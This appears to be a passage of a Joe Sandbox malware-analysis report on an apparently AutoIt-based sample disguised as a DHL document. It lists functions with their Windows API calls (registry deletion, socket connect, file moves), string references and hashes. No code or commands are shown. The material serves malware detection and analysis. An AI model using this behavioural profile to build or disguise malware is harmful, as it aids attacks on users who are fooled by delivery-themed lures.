Instruction ID: 97c37354f7b2fe3f0c6b5ca71ff02ca6b7a20d283c4a8544834e0b9f45d35e94
Opcode Fuzzy Hash: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
Instruction Fuzzy Hash: 9D51F5A05087D53DFB3287248C55BBABFAD5F06300F0C8589F1D5468E2D795EC94EB61

Function 0093589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009358AC
_wcsncpy.LIBCMT ref: 009358E1
_wcsncpy.LIBCMT ref: 00935913
_wcsncpy.LIBCMT ref: 00935946
_wcsncpy.LIBCMT ref: 00935988
_wcsncpy.LIBCMT ref: 009359C2
_wcsncpy.LIBCMT ref: 009359F1

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
Instruction ID: 8241e98bedef40682154c11ad196435e1623e8c407e4804011aaa20d1a3f171f
Opcode Fuzzy Hash: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
Instruction Fuzzy Hash: 15418365C2161876CB10FBB888869DFB7A8EF04310F519566F618E3122E634E715CBA6

Function 009338AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7

Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0

lstrcmpiW.KERNEL32(?,?), ref: 009338F3
_wcscmp.LIBCMT ref: 0093390F
MoveFileW.KERNEL32(?,?), ref: 00933927
_wcscat.LIBCMT ref: 0093396F
SHFileOperationW.SHELL32(?), ref: 009339DB

Strings

\*.*, xrefs: 00933969

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
Instruction ID: 10a3f23d99c0559db7f9636ca66e57d8c52e8d406d54e04bab9bef19dee7f278
Opcode Fuzzy Hash: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
Instruction Fuzzy Hash: BA416DB254C384DAC751EF64C881AEBB7ECEF89350F14592EB48AC3151EA74D688CB52

Function 00957500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00957519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009575C0
IsMenu.USER32(?), ref: 009575D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00957620
DrawMenuBar.USER32 ref: 00957633

Strings

0, xrefs: 0095750D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
Instruction ID: bc1c881ff8fee560561bc115891e9b3b6fedb4c055212a8e623b9060725fed09
Opcode Fuzzy Hash: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
Instruction Fuzzy Hash: 4A416A74A05608EFDB10DF9AE884EAABBF8FB04361F048029FD1597250D730AE45DFA1

Function 0095122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0095125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00951286
FreeLibrary.KERNEL32(00000000), ref: 0095133D

Part of subcall function 0095122D: RegCloseKey.ADVAPI32(?), ref: 009512A3
Part of subcall function 0095122D: FreeLibrary.KERNEL32(?), ref: 009512F5
Part of subcall function 0095122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00951318

RegDeleteKeyW.ADVAPI32(?,?), ref: 009512E0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
Instruction ID: 04a00da72d790442b2590a581b2c22e2c59c3c05acb3b31fd4994a5f7f5c90f0
Opcode Fuzzy Hash: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
Instruction Fuzzy Hash: BB315E71911209BFDB14DBA1DC99EFFB7BCEF08311F000169E911E2151DB749E499BA0

Function 0095653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0095655B
GetWindowLongW.USER32(00E257D0,000000F0), ref: 0095658E
GetWindowLongW.USER32(00E257D0,000000F0), ref: 009565C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009565F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0095661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00956630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0095664A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
Instruction ID: bc99fd222ded3c58595779b4d08b54c161685ece3f06a962dfa5f78d2f03eee6
Opcode Fuzzy Hash: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
Instruction Fuzzy Hash: DD315730659214AFDB20CF1ADC88F553BE5FB4A362F9801A8F9018B2B5DB31EC45EB41

Function 00946486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009464D9
WSAGetLastError.WSOCK32(00000000), ref: 009464E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946521
connect.WSOCK32(00000000,?,00000010), ref: 0094652A
WSAGetLastError.WSOCK32 ref: 00946534
closesocket.WSOCK32(00000000), ref: 0094655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946576

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
Instruction ID: 590e1f927b2442d1e415a6699ced31718cfa2af096c810601d47c4a6d8db216d
Opcode Fuzzy Hash: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
Instruction Fuzzy Hash: D931A171610218ABDF10AF24CC95FBE7BBCEB45721F004029F94AD7291DB74AD04DB62

Function 0092E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E120
SysAllocString.OLEAUT32(00000000), ref: 0092E123
SysAllocString.OLEAUT32 ref: 0092E144
SysFreeString.OLEAUT32 ref: 0092E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0092E167
SysAllocString.OLEAUT32(?), ref: 0092E175

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0c5930a66adca3b37d6de0f59f854cdbc94b8c4e72002e58352643009fe9dcf1
Instruction ID: f823bfc70b503edf149603e4a263878b556f95ab1667cf1e3d4ae59427865b53
Opcode Fuzzy Hash: 0c5930a66adca3b37d6de0f59f854cdbc94b8c4e72002e58352643009fe9dcf1
Instruction Fuzzy Hash: 46217435608218AFDB10AFA9DCC8CAB77ECEB09760B108135F915CB2A5DB74DC419B64

Function 0092FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0092FB81
__wcsnicmp.LIBCMT ref: 0092FBA2
__wcsnicmp.LIBCMT ref: 0092FBBC

Strings

#requireadmin, xrefs: 0092FB9C
#notrayicon, xrefs: 0092FB79
#OnAutoItStartRegister, xrefs: 0092FBB6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: f7829adc1069fe594894332ea45e68640f24a0b44b922347a68e0b8736d99491
Instruction ID: e2a227eeae932f17c81e9921cea8191e72c2cdcce8935dd624cba0cdc3a8e32b
Opcode Fuzzy Hash: f7829adc1069fe594894332ea45e68640f24a0b44b922347a68e0b8736d99491
Instruction Fuzzy Hash: 03214572100A75A6D230E738ED22EB773ACEF51300F104436F98AC7189EB50AD818792

Function 0095783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009578A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009578AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009578B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009578C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009578D4

Strings

Msctls_Progress32, xrefs: 00957872

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
Instruction ID: 7241f2dc5ea4287ee4f2dbb09eee557b03eb32adfa16dd1ea0891b0dd59d2fc9
Opcode Fuzzy Hash: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
Instruction Fuzzy Hash: CA1190B2114219BFEF159FA5CC85EEB7F6DEF48768F014115BB04A2090C772AC21DBA0

Function 008F41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008F4292,?), ref: 008F41E3
GetProcAddress.KERNEL32(00000000), ref: 008F41EA
EncodePointer.KERNEL32(00000000), ref: 008F41F6
DecodePointer.KERNEL32(00000001,008F4292,?), ref: 008F4213

Strings

RoInitialize, xrefs: 008F41D2
combase.dll, xrefs: 008F41DE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
Instruction ID: cb1a9d7d4a3f6578c7ec438bc82c37105aba5963ea12667d71712f28e8e292da
Opcode Fuzzy Hash: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
Instruction Fuzzy Hash: E2E01AB06BC700AFEB216BBAEC29F153AA4F760757F504436B522D50E0DBB54096AF00

Function 008F429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008F41B8), ref: 008F42B8
GetProcAddress.KERNEL32(00000000), ref: 008F42BF
EncodePointer.KERNEL32(00000000), ref: 008F42CA
DecodePointer.KERNEL32(008F41B8), ref: 008F42E5

Strings

RoUninitialize, xrefs: 008F42A7
combase.dll, xrefs: 008F42B3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
Instruction ID: 8c24f56cba16ab32d6949d6035112c49b12526ab5c0cdc827b11f5a763e543ec
Opcode Fuzzy Hash: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
Instruction Fuzzy Hash: CEE012785AD700ABEA21AB36EC18F023AA4B73079AF100036F105E20B0CBB04541EB08

Function 0093675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009368AD
_memmove.LIBCMT ref: 009367E8

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

_memmove.LIBCMT ref: 0093685B
_memmove.LIBCMT ref: 00936942
_memmove.LIBCMT ref: 0093695B
_memmove.LIBCMT ref: 00936977

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
Instruction ID: f35fb2ae296d3f5e98ecfe5ec2cc4cb5bb276deac6ce40353c2ad024c0cbef86
Opcode Fuzzy Hash: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
Instruction Fuzzy Hash: 3B619E3050065AABCF11EF28C895FFE7BA9FF44318F04861AF9959B292DB349941CB52

Function 0095046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00950588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009505AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009505D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00950617
RegCloseKey.ADVAPI32(00000000), ref: 00950624

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 43ac15ea9a102ecb0894f83276ec44a90714b094dae0c5792b78577b5d2151a3
Instruction ID: 2aa46fb912f62add0161c2df0999fd948767cd5eed17b567bfaab6462bef832e
Opcode Fuzzy Hash: 43ac15ea9a102ecb0894f83276ec44a90714b094dae0c5792b78577b5d2151a3
Instruction Fuzzy Hash: 9D513A31108200AFCB14EF29D895E6ABBE8FF85315F04491EF995972A1EB31E909DB52

Function 00955A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00955A82
GetMenuItemCount.USER32(00000000), ref: 00955AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00955AE1
GetMenuItemID.USER32(?,?), ref: 00955B50
GetSubMenu.USER32(?,?), ref: 00955B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00955BAF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: cacd89259e3dd691f5a93f01ebe79a02a994491698009788865141ee17e80a05
Instruction ID: 0e8ff3a8d07144d79c67b4fc80e3523580a80556d30f9737406988b1b4a6d099
Opcode Fuzzy Hash: cacd89259e3dd691f5a93f01ebe79a02a994491698009788865141ee17e80a05
Instruction Fuzzy Hash: DA517C31A00619EFCF11EFA5C855AAEBBB4FF48321F11446AED01A7352DB34AE458B91

Function 0092F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0092F3F7
VariantClear.OLEAUT32(00000013), ref: 0092F469
VariantClear.OLEAUT32(00000000), ref: 0092F4C4
_memmove.LIBCMT ref: 0092F4EE
VariantClear.OLEAUT32(?), ref: 0092F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0092F569

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
Instruction ID: 92769d2c883e08054995728610082c6abd8387facbc067a62fb8e9e522e10015
Opcode Fuzzy Hash: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
Instruction Fuzzy Hash: 7D5167B5A00219AFCB10DF58D894EAAB7B8FF48314B158569F959DB314D730E911CBA0

Function 009326F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00932747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932792
IsMenu.USER32(00000000), ref: 009327B2
CreatePopupMenu.USER32 ref: 009327E6
GetMenuItemCount.USER32(000000FF), ref: 00932844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00932875

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
Instruction ID: e85b34f5e612faa4cae7f1e346d728e30ff3d9b82e0026410b22cca28a313f10
Opcode Fuzzy Hash: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
